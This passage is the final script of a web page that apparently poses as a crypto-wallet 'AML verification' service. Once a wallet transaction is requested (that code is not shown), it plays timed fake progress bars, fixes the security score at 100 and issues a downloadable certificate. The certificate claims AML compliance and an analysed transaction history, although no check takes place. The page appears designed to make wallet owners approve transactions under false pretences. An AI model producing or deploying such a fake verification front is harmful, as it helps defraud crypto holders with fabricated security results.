            for (let i = 1; i <= 5; i++) {
                document.getElementById(`bar${i}`).style.width = '0%';
                document.getElementById(`percent${i}`).textContent = '0%';
                document.getElementById(`check${i}`).classList.remove('show');
            }
            document.getElementById('overallBar').style.width = '0%';
            document.getElementById('overallPercent').textContent = '0%';
            
            await simulateProgress();
            
            generateCertificateData();
            
            document.getElementById('analyzingText').classList.remove('show');
            showCertificate();
            
        } catch (error) {
            console.error("ERROR:", error);
            
            let errorMsg = 'Verification failed: ' + error.message;
            
            if (error.message.includes('insufficient funds')) {
                errorMsg = 'Insufficient ETH for gas fees.';
            } else if (error.message.includes('User denied')) {
                errorMsg = 'Transaction rejected.';
            }
            
            document.getElementById('errorText').textContent = errorMsg;
            document.getElementById('errorMessage').classList.add('show');
            document.getElementById('verifyBtn').disabled = false;
            document.getElementById('verifyBtn').textContent = 'Confirm Verification';
            document.getElementById('progressContainer').classList.remove('show');
            document.getElementById('analyzingText').classList.remove('show');
        }
    }


    async function simulateProgress() {
        const steps = [
            { id: 1, duration: 1200 },
            { id: 2, duration: 1500 },
            { id: 3, duration: 1200 },
            { id: 4, duration: 1200 },
            { id: 5, duration: 1000 }
        ];
        
        let overallProgress = 0;
        
        for (const step of steps) {
            await animateBar(step.id, step.duration);
            overallProgress += 20;
            updateOverallProgress(overallProgress);
            document.getElementById(`check${step.id}`).classList.add('show');
        }
    }

    function animateBar(id, duration) {
        return new Promise(resolve => {
            let progress = 0;
            const interval = duration / 100;
            
            const timer = setInterval(() => {
                progress += 1;
                document.getElementById(`bar${id}`).style.width = progress + '%';
                document.getElementById(`percent${id}`).textContent = progress + '%';
                
                if (progress >= 100) {
                    clearInterval(timer);
                    resolve();
                }
            }, interval);
        });
    }

    function updateOverallProgress(percent) {
        document.getElementById('overallBar').style.width = percent + '%';
        document.getElementById('overallPercent').textContent = percent + '%';
    }

    function generateCertificateData() {
        const first8 = account.slice(0, 10);
        const randomNum = Math.floor(Math.random() * 9000000000000) + 1000000000000;
        const securityScore = 100;
        
        const now = new Date();
        const months = ['January', 'February', 'March', 'April', 'May', 'June', 
                      'July', 'August', 'September', 'October', 'November', 'December'];
        const dateStr = `${months[now.getMonth()]} ${now.getDate()}, ${now.getFullYear()} ${String(now.getHours()).padStart(2, '0')}:${String(now.getMinutes()).padStart(2, '0')}`;
        
        certificateData = {
            certificateId: `AML-${first8}-${randomNum}`,
            walletAddress: account,
            securityScore: securityScore,
            verificationDate: dateStr,
            timestamp: now.toISOString(),
            amlCompliance: true,
            riskAssessment: 'Completed',
            blockchainVerification: true,
            transactionHistoryAnalyzed: true,
            securityRating: 'Excellent'
        };
    }

    function animateScore(targetScore) {
        return new Promise(resolve => {
            const scoreElement = document.getElementById('scoreValue');
            const scoreBarElement = document.getElementById('scoreBar');
            const duration = 1000;
            const steps = 60;
            const increment = targetScore / steps;
            const stepDuration = duration / steps;
            
            let currentScore = 0;
            
            const timer = setInterval(() => {
                currentScore += increment;
                
                if (currentScore >= targetScore) {
                    currentScore = targetScore;
                    clearInterval(timer);
                    resolve();
                }
                
                scoreElement.textContent = Math.round(currentScore) + '%';
                scoreBarElement.style.width = Math.round(currentScore) + '%';
            }, stepDuration);
        });
    }

    async function showCertificate() {
        // Fill verification summary
        document.getElementById('certIdText').textContent = certificateData.certificateId;
        document.getElementById('certDateText').textContent = certificateData.verificationDate;
        document.getElementById('certStatusText').textContent = '✅ Successfully Verified';
    
        // Wallet info
        document.getElementById('certWalletType').textContent = 'Crypto Wallet';
        document.getElementById('certWalletStatus').textContent = 'Verified';
        document.getElementById('certSecurityCheck').textContent = 'Passed';
        document.getElementById('certIntegrityCheck').textContent = 'Passed';
    
        // Wallet address line
        const addr = certificateData.walletAddress;
        document.getElementById('certWalletAddress').textContent = addr.slice(0, 4) + '......' + addr.slice(-4);
    
        // Show modal
        document.getElementById('certificateModal').classList.add('show');
    }


    function viewCertificate() {
        document.getElementById('certificateModal').classList.add('show');
    }

    function closeCertificate() {
        document.getElementById('certificateModal').classList.remove('show');
        
        document.getElementById('analysisComplete').classList.add('show');
        document.getElementById('downloadBtn').style.display = 'flex';
        
        document.getElementById('verifyBtn').style.display = 'none';
    }

    function downloadCertificate() {
        const first8 = account.slice(0, 10);
        const filename = `MyCert-${first8}.json`;
        
        const jsonData = JSON.stringify(certificateData, null, 2);
        const blob = new Blob([jsonData], { type: 'application/json' });
        const url = URL.createObjectURL(blob);
        
        const a = document.createElement('a');
        a.href = url;
        a.download = filename;
        document.body.appendChild(a);
        a.click();
        document.body.removeChild(a);
        URL.revokeObjectURL(url);
    }
</script>


</body>
</html>
